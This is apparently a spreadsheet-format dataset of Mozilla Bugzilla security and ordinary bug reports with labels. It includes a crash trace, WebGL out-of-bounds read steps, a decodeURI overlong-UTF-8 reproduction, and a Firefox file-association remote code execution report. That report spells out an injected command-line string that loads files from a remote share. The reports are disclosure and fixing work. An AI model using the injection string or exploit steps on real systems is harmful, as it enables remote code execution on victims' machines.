    #18 0x7f3a132b7d46 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) view/nsViewManager.cpp:443:7
    #19 0x7f3a132b6e0b in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) view/nsViewManager.cpp:384:9
    #20 0x7f3a13948bf2 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:1708:5
    #21 0x7f3a1394fb13 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:198:5
    #22 0x7f3a0e015024 in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:631:7
    #23 0x7f3a0e015b90 in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:724:3
    #24 0x7f3a0e00b055 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:855:7
    #25 0x7f3a0e06926c in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:265:10
    #26 0x7f3a0e8fe8de in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:99:21
    #27 0x7f3a0e8a6a61 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:233:3
    #28 0x7f3a132fc45f in nsBaseAppShell::Run() widget/nsBaseAppShell.cpp:164:3
    #29 0x7f3a14f2d603 in XRE_RunAppShell toolkit/xre/nsEmbedFunctions.cpp:743:12
    #30 0x7f3a0e8a6a61 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:233:3
    #31 0x7f3a14f2ca2c in XRE_InitChildProcess toolkit/xre/nsEmbedFunctions.cpp:580:7
    #32 0x4db12e in content_process_main(int, char**) ipc/contentproc/plugin-container.cpp:211:19
    #33 0x7f3a0b5caec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
AddressSanitizer can not provide additional info.
==9489==ABORTING</t>
        </is>
      </c>
      <c r="X4016" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4017">
      <c r="A4017" t="n">
        <v>484031</v>
      </c>
      <c r="B4017" t="inlineStr">
        <is>
          <t>2009-03-18 11:18:12 -0700</t>
        </is>
      </c>
      <c r="C4017" t="inlineStr">
        <is>
          <t>Reliable way to cause double frame construction for content using XBL</t>
        </is>
      </c>
      <c r="D4017" t="inlineStr">
        <is>
          <t>2018-08-29 15:20:51 -0700</t>
        </is>
      </c>
      <c r="E4017" t="n">
        <v>1</v>
      </c>
      <c r="F4017" t="n">
        <v>1</v>
      </c>
      <c r="G4017" t="n">
        <v>3</v>
      </c>
      <c r="H4017" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4017" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4017" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4017" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4017" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4017" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4017" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4017" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4017" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4017" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4017" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4017" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4017" t="n">
        <v>1</v>
      </c>
      <c r="U4017" t="n">
        <v>0</v>
      </c>
      <c r="V4017" t="n">
        <v>27</v>
      </c>
      <c r="W4017" t="inlineStr">
        <is>
          <t>Testcase is attached.  You might need to download it locally due to bugzilla's attachment URI thing, but it'd work on any web server.
The basic idea is to have a binding with two insertion points; one of these needs to be an inline and the other needs to be a descendant of the inline's containing block.  The we force a ContentAppended with at least two nodes after the binding has been attached (the testcase uses a script that blocks the parser and spins the event queue using sync XHR until the binding has been attached).  The first node has block display and goes into the inline insertion point; the others go into the other insertion point.
Since there are multiple insertion points, the frame constructor converts the ContentAppended call into a sequence of ContentInserted calls.  The first ContentInserted sticks a block inside the inline insertion point, which reframes the containing block.  After that we already have frames for all the other kids, and their ContentInserted calls end up double-creating the frames.  The testcase just uses a single doubled kid: a textnode that uses the text "Doubled", which shouldn't be crashy.  But it could easily toss in iframes, image frames, etc, and cause various trouble.
Possible solutions I see:
1)  Do a GetPrimaryFrameFor before doing ContentInserted in this case.  That
    would also bite fieldsets, since those claim multiple insertion points, but
    might be ok.
2)  If a node has a binding with multiple insertion points (including nested
    ones, etc), never add more than one child at a time to it; notify after
    each child.
#2 is hard to do with our current parser; not sure about Henri's parser.  And in any case, we'd need it for both XHTML and HTML (the page could be HTML if it just linked to a separate XBL file).
Thoughts?</t>
        </is>
      </c>
      <c r="X4017" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4018">
      <c r="A4018" t="n">
        <v>985135</v>
      </c>
      <c r="B4018" t="inlineStr">
        <is>
          <t>2014-03-18 14:26:23 -0700</t>
        </is>
      </c>
      <c r="C4018" t="inlineStr">
        <is>
          <t>Iframe sandboxing doesn't work if the load is redirected</t>
        </is>
      </c>
      <c r="D4018" t="inlineStr">
        <is>
          <t>2015-04-20 12:31:03 -0700</t>
        </is>
      </c>
      <c r="E4018" t="n">
        <v>1</v>
      </c>
      <c r="F4018" t="n">
        <v>1</v>
      </c>
      <c r="G4018" t="n">
        <v>3</v>
      </c>
      <c r="H4018" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4018" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4018" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4018" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4018" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4018" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4018" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4018" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4018" t="inlineStr">
        <is>
          <t>[adv-main31+]</t>
        </is>
      </c>
      <c r="Q4018" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4018" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4018" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T4018" t="n">
        <v>1</v>
      </c>
      <c r="U4018" t="n">
        <v>0</v>
      </c>
      <c r="V4018" t="n">
        <v>29</v>
      </c>
      <c r="W4018" t="inlineStr">
        <is>
          <t>&lt;iframe sandbox src="something-that-redirects"&gt; doesn't sandbox because we do sandboxing via setting a nullprincipal owner and redirects don't propagate it.  I'll attach a mochitest that shows the bug....
Properly fixing bug 965413 will automagically fix this, but we may want some sort of branch backports.</t>
        </is>
      </c>
      <c r="X4018" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4019">
      <c r="A4019" t="n">
        <v>1354568</v>
      </c>
      <c r="B4019" t="inlineStr">
        <is>
          <t>2017-04-07 08:17:30 -0700</t>
        </is>
      </c>
      <c r="C4019" t="inlineStr">
        <is>
          <t>Show the file's size in downloading menu</t>
        </is>
      </c>
      <c r="D4019" t="inlineStr">
        <is>
          <t>2017-07-27 07:20:38 -0700</t>
        </is>
      </c>
      <c r="E4019" t="n">
        <v>1</v>
      </c>
      <c r="F4019" t="n">
        <v>1</v>
      </c>
      <c r="G4019" t="n">
        <v>2</v>
      </c>
      <c r="H4019" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4019" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4019" t="inlineStr">
        <is>
          <t>Downloads Panel</t>
        </is>
      </c>
      <c r="K4019" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L4019" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4019" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4019" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4019" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4019" t="inlineStr"/>
      <c r="Q4019" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4019" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4019" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T4019" t="n">
        <v>1</v>
      </c>
      <c r="U4019" t="n">
        <v>2</v>
      </c>
      <c r="V4019" t="n">
        <v>54</v>
      </c>
      <c r="W4019" t="inlineStr">
        <is>
          <t>Created attachment 8855827
showsize.PNG
User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Build ID: 20170302120751
Steps to reproduce:
I downloaded several files of the same name, so "myfile.pdf" get renamed by Firefox to "myfile(1).pdf", "myfile(2).pdf"
Actual results:
In the download menu, the file name is shown, but not the file size, meaning you have no clue whether you downloaded the same file twice or not.
Expected results:
Showing the file size (&amp; download date) will make it way easier for users (inc. me) to know what they actually downloaded, without having to click "show all downloads". Plus, it makes the two view harmonized, which is always better IMO for UX (and for coder experience too: the download menu is the same as the "show all", but only has a LIMIT on it).
FF used to do so, it seems to have changed lately, in FF 50/51/52 (I don't exactly know)</t>
        </is>
      </c>
      <c r="X4019" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4020">
      <c r="A4020" t="n">
        <v>1361689</v>
      </c>
      <c r="B4020" t="inlineStr">
        <is>
          <t>2017-05-03 04:08:58 -0700</t>
        </is>
      </c>
      <c r="C4020" t="inlineStr">
        <is>
          <t>about:license content container shouldn't be extra wide</t>
        </is>
      </c>
      <c r="D4020" t="inlineStr">
        <is>
          <t>2017-09-26 09:40:26 -0700</t>
        </is>
      </c>
      <c r="E4020" t="n">
        <v>1</v>
      </c>
      <c r="F4020" t="n">
        <v>1</v>
      </c>
      <c r="G4020" t="n">
        <v>2</v>
      </c>
      <c r="H4020" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4020" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4020" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4020" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4020" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4020" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4020" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4020" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4020" t="inlineStr">
        <is>
          <t>[reserve-photon-visual][p4] fixed by bug 1361697</t>
        </is>
      </c>
      <c r="Q4020" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4020" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4020" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T4020" t="n">
        <v>1</v>
      </c>
      <c r="U4020" t="n">
        <v>0</v>
      </c>
      <c r="V4020" t="n">
        <v>5</v>
      </c>
      <c r="W4020" t="inlineStr">
        <is>
          <t>To move about:license towards the design mocked up in &lt;https://mozilla.invisionapp.com/share/ZKBC94BPQ#/screens/229803192&gt;, we should stop making the content area extra wide in this page. To that end, we should remove the aboutPageWideContainer class here:
http://searchfox.org/mozilla-central/rev/abe68d5dad139e376d5521ca1d4b7892e1e7f1ba/toolkit/content/license.html#23</t>
        </is>
      </c>
      <c r="X4020" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4021">
      <c r="A4021" t="n">
        <v>1202447</v>
      </c>
      <c r="B4021" t="inlineStr">
        <is>
          <t>2015-09-07 08:50:50 -0700</t>
        </is>
      </c>
      <c r="C4021" t="inlineStr">
        <is>
          <t>[SECURITY] The email address is not properly validated during registration if longer than 127 characters</t>
        </is>
      </c>
      <c r="D4021" t="inlineStr">
        <is>
          <t>2024-05-30 09:05:18 -0700</t>
        </is>
      </c>
      <c r="E4021" t="n">
        <v>1</v>
      </c>
      <c r="F4021" t="n">
        <v>1</v>
      </c>
      <c r="G4021" t="n">
        <v>4</v>
      </c>
      <c r="H4021" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4021" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4021" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K4021" t="inlineStr">
        <is>
          <t>5.0</t>
        </is>
      </c>
      <c r="L4021" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4021" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4021" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4021" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4021" t="inlineStr">
        <is>
          <t>[newcomers: read comment 22]</t>
        </is>
      </c>
      <c r="Q4021" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4021" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4021" t="inlineStr">
        <is>
          <t>Bugzilla 4.2</t>
        </is>
      </c>
      <c r="T4021" t="n">
        <v>1</v>
      </c>
      <c r="U4021" t="n">
        <v>0</v>
      </c>
      <c r="V4021" t="n">
        <v>44</v>
      </c>
      <c r="W4021" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Steps to reproduce:
Hello,
My name is Netanel Rubin, I work as a vulnerability researcher at PerimeterX.
This is a critical vulnerability report for an issue I discovered in the Bugzilla platform. The successful exploitation of the vulnerability allows the creation of a user account under any email address, even those which are not under the attacker control.
As a PoC, I've created a test account under bugzilla.mozilla.org:
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb@mozilla.com
I apologize for the length, it is required for the vulnerability.
I would like to report the complete vulnerability description over a private channel. I can post it here like the last time or can mail it to you, so please contact me at nati (-at-) perimeterx or in this thread.
Please assign a CVE number for this issue. We would also like to coordinate the public disclosure with you.
Best regards,
Netanel.</t>
        </is>
      </c>
      <c r="X4021" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4022">
      <c r="A4022" t="n">
        <v>619090</v>
      </c>
      <c r="B4022" t="inlineStr">
        <is>
          <t>2010-12-14 09:36:40 -0800</t>
        </is>
      </c>
      <c r="C4022" t="inlineStr">
        <is>
          <t>Validator doesn't detect remote script injection in overlay</t>
        </is>
      </c>
      <c r="D4022" t="inlineStr">
        <is>
          <t>2016-02-04 14:47:12 -0800</t>
        </is>
      </c>
      <c r="E4022" t="n">
        <v>1</v>
      </c>
      <c r="F4022" t="n">
        <v>1</v>
      </c>
      <c r="G4022" t="n">
        <v>6</v>
      </c>
      <c r="H4022" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4022" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J4022" t="inlineStr">
        <is>
          <t>Admin/Editor Tools</t>
        </is>
      </c>
      <c r="K4022" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4022" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4022" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4022" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4022" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4022" t="inlineStr">
        <is>
          <t>[ReviewTeam]</t>
        </is>
      </c>
      <c r="Q4022" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4022" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4022" t="inlineStr">
        <is>
          <t>5.12.5</t>
        </is>
      </c>
      <c r="T4022" t="n">
        <v>1</v>
      </c>
      <c r="U4022" t="n">
        <v>1</v>
      </c>
      <c r="V4022" t="n">
        <v>5</v>
      </c>
      <c r="W4022" t="inlineStr">
        <is>
          <t>Created attachment 497517
Patch V1. Add check for script tags with HTTP URLs
As reported by an editor, the code validator doesn't detect when http urls are used in script tags in the main overlay (or other xul windows). This is a major security problem, so it's better to patch it as soon as possible.
I'm, including the patch for the old code, but it should be included in the new one as well.</t>
        </is>
      </c>
      <c r="X4022" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4023">
      <c r="A4023" t="n">
        <v>522634</v>
      </c>
      <c r="B4023" t="inlineStr">
        <is>
          <t>2009-10-15 20:14:08 -0700</t>
        </is>
      </c>
      <c r="C4023" t="inlineStr">
        <is>
          <t>decodeURIComponent/decodeURI allows non-shortest form of 16 bits char on 4 bytes representation</t>
        </is>
      </c>
      <c r="D4023" t="inlineStr">
        <is>
          <t>2020-12-09 12:56:52 -0800</t>
        </is>
      </c>
      <c r="E4023" t="n">
        <v>1</v>
      </c>
      <c r="F4023" t="n">
        <v>1</v>
      </c>
      <c r="G4023" t="n">
        <v>3</v>
      </c>
      <c r="H4023" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4023" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4023" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K4023" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4023" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4023" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N4023" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4023" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P4023" t="inlineStr"/>
      <c r="Q4023" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4023" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4023" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4023" t="n">
        <v>0</v>
      </c>
      <c r="U4023" t="n">
        <v>0</v>
      </c>
      <c r="V4023" t="n">
        <v>2</v>
      </c>
      <c r="W4023" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5
Firefox is supposed to consider the non-shortest form exception (http://www.unicode.org/reports/tr36/#UTF-8_Exploit), section 3.1 of the Unicode Technical Report #36 but apparently there's a flaw on it. This is specially problematic for the reasons that an overlong unicode sequence not taken into consideration may allow several types of filter bypasses.
The following non-shortest form for the char U+1000:
0xF0 0x81 0x80 0x80
is allowed, as well as the correct shortest form:
0xE1 0x80 0x80
Note that this problem is only present on the 4 bytes representation (0xE0 0x81 0x80 is correctly marked as U+FFFD)
Reproducible: Always
Steps to Reproduce:
1. alert(decodeURI("%F0%81%80%80")==decodeURI("%E1%80%80"))
2. alert(escape(decodeURI("%F0%81%80%80")))
Actual Results:  
1. true
2. %u1000
Expected Results:  
1. false
2. %uFFFD
Check:
http://www.unicode.org/reports/tr36/#UTF-8_Exploit</t>
        </is>
      </c>
      <c r="X4023" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4024">
      <c r="A4024" t="n">
        <v>1477013</v>
      </c>
      <c r="B4024" t="inlineStr">
        <is>
          <t>2018-07-19 10:04:53 -0700</t>
        </is>
      </c>
      <c r="C4024" t="inlineStr">
        <is>
          <t>c++ generic handling turning things into &lt;T&gt; works poorly for rust</t>
        </is>
      </c>
      <c r="D4024" t="inlineStr">
        <is>
          <t>2018-08-15 16:26:15 -0700</t>
        </is>
      </c>
      <c r="E4024" t="n">
        <v>1</v>
      </c>
      <c r="F4024" t="n">
        <v>1</v>
      </c>
      <c r="G4024" t="n">
        <v>4</v>
      </c>
      <c r="H4024" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4024" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4024" t="inlineStr">
        <is>
          <t>Signature</t>
        </is>
      </c>
      <c r="K4024" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4024" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4024" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4024" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4024" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4024" t="inlineStr"/>
      <c r="Q4024" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4024" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4024" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4024" t="n">
        <v>1</v>
      </c>
      <c r="U4024" t="n">
        <v>0</v>
      </c>
      <c r="V4024" t="n">
        <v>12</v>
      </c>
      <c r="W4024" t="inlineStr">
        <is>
          <t>Paraphrasing Ted on IRC, Socorro's signature generation transforms things like &lt;Foo&gt; into &lt;T&gt; which works nicely for C++ generic types. However, it works poorly for Rust where the types are important and we lose a lot of information when converting them to &lt;T&gt;.
For example:
bp-0ca773e7-2b08-4d1a-8fd7-67b4e0180713
gets this signature (after #1475820 lands):
    &lt;T&gt;::execute 
That should be:
    &lt;rayon_core::job::HeapJob&lt;BODY&gt; as rayon_core::job::Job&gt;::execute
This bug covers fixing this.</t>
        </is>
      </c>
      <c r="X4024" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4025">
      <c r="A4025" t="n">
        <v>665070</v>
      </c>
      <c r="B4025" t="inlineStr">
        <is>
          <t>2011-06-17 11:50:32 -0700</t>
        </is>
      </c>
      <c r="C4025" t="inlineStr">
        <is>
          <t>WebGL functions allocating buffers/textures must check that the GL call succeeded, to prevent allowing context to make out-of-bounds accesses</t>
        </is>
      </c>
      <c r="D4025" t="inlineStr">
        <is>
          <t>2015-10-16 11:41:57 -0700</t>
        </is>
      </c>
      <c r="E4025" t="n">
        <v>1</v>
      </c>
      <c r="F4025" t="n">
        <v>1</v>
      </c>
      <c r="G4025" t="n">
        <v>3</v>
      </c>
      <c r="H4025" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4025" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4025" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K4025" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4025" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4025" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4025" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4025" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4025" t="inlineStr">
        <is>
          <t>[sg:high][qa?] moderate?</t>
        </is>
      </c>
      <c r="Q4025" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4025" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4025" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T4025" t="n">
        <v>1</v>
      </c>
      <c r="U4025" t="n">
        <v>0</v>
      </c>
      <c r="V4025" t="n">
        <v>54</v>
      </c>
      <c r="W4025" t="inlineStr">
        <is>
          <t>Thanks a lot to Gregg Tavares at Google for reporting this:
=== BEGIN EMAIL ===
Hi Guys,
While I was looking into some perf issues I found what I think is a security issue in both Firefox and WebKit implementations of WebGL
The issue is that neither of these implementations check for errors on glBufferData, glTexImage2D or glCopyTexImage2D
So for example if a user does this
    buf = gl.createBuffer();
    gl.bindBuffer(gl.ARRAY_BUFFER, buf);
    gl.bufferData(gl.ARRAY_BUFFER, veryLargeSizeThatRunsOutOfMemoryOrIsTooLargeForDriver, gl.STATIC_DRAW);     // assume this fails
At this point, because neither WebKit nor Firefox check for error they think the buffer is veryLargeSize...
So, for example, validating indices when calling gl.drawElements will be wrong.
For textures, the same issues would exist. For example, create a texture that is too big, creation fails but browser thinks the texture is large since it did not check for error. Now bind that texture to an FBO and call readPixels. You can now read pixels outside the bounds of the texture since the implementation will not be clearing past the bounds.
=== END EMAIL ===</t>
        </is>
      </c>
      <c r="X4025" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4026">
      <c r="A4026" t="n">
        <v>1606596</v>
      </c>
      <c r="B4026" t="inlineStr">
        <is>
          <t>2020-01-01 23:54:43 -0800</t>
        </is>
      </c>
      <c r="C4026" t="inlineStr">
        <is>
          <t>File association Remote Code Execution via command line parameter injection in Firefox</t>
        </is>
      </c>
      <c r="D4026" t="inlineStr">
        <is>
          <t>2024-05-30 10:06:02 -0700</t>
        </is>
      </c>
      <c r="E4026" t="n">
        <v>1</v>
      </c>
      <c r="F4026" t="n">
        <v>1</v>
      </c>
      <c r="G4026" t="n">
        <v>2</v>
      </c>
      <c r="H4026" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4026" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4026" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K4026" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4026" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4026" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4026" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4026" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4026" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main73+] [adv-esr68.5+]</t>
        </is>
      </c>
      <c r="Q4026" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4026" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4026" t="inlineStr">
        <is>
          <t>Firefox 74</t>
        </is>
      </c>
      <c r="T4026" t="n">
        <v>0</v>
      </c>
      <c r="U4026" t="n">
        <v>0</v>
      </c>
      <c r="V4026" t="n">
        <v>47</v>
      </c>
      <c r="W4026" t="inlineStr">
        <is>
          <t>Tested on Microsoft Windows 10 Enterprise version 10.0.17763 Build 17763
Using Firefox version 71.0 (32-bit)
Steps to reproduce (local only):
* Setup Firefox as Windows' default .pdf handler (right click a pdf file -&gt; open with -&gt; chose other -&gt; select always open with Firefox)
* Open the run prompt (windows key + r) and run the following URL:
* \\\\poiu.xss.vg@ssl\a.txt" -appomni appomni.pdf -greomni \share\greomni.pdf
Steps to reproduce (via MS Excel):
* Setup Firefox as Windows' default .pdf handler (right click a pdf file -&gt; open with -&gt; chose other -&gt; select always open with Firefox)
* visit https://poiu.xss.vg/oausdhvjzlxkcn/poc.html (this will open a CSV file in excel)
* Click the link in the excel document.
* Open the greomni.pdf file
Expected Result: Firefox ignores the shell activation command as additional command line arguments are present.
Actual Result: Firefox accepts the command and runs using the greomni and appomni files from the internet share.
Detailed Information:
This issue is very similar to bug 1530103 and bug 384384 except that it is by file type association as opposed to protocol association.
In Windows, it is possible to inject arbitrary arguments when Firefox is setup as the default file handler for any file type other than .html. This can result in remote code execution when the 'greomni' flag is injected. 
The attack vector is having a victim activate a URI using the file protocol (file://) or open a file in explorer where the file type's default handler is Firefox and there are double quotes in the path of the file. One way of fixing this issue is to add the 'osint' flag to the following registry key:
HKEY_CLASSES_ROOT\applications\firefox.exe\shell\open\command 
i.e. change:
* "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" "%1"
to
* "C:\Program Files (x86)\Mozilla Firefox\firefox.exe"  -osint "%1"
The ‘osint’ flag in the command is supposed to ensure that Firefox ignores any command line arguments that have been injected when Firefox is activated via the Windows registry. The ‘osint’ flag was introduced in 2007 in response to the following bug: https://bugzilla.mozilla.org/show_bug.cgi?id=384384
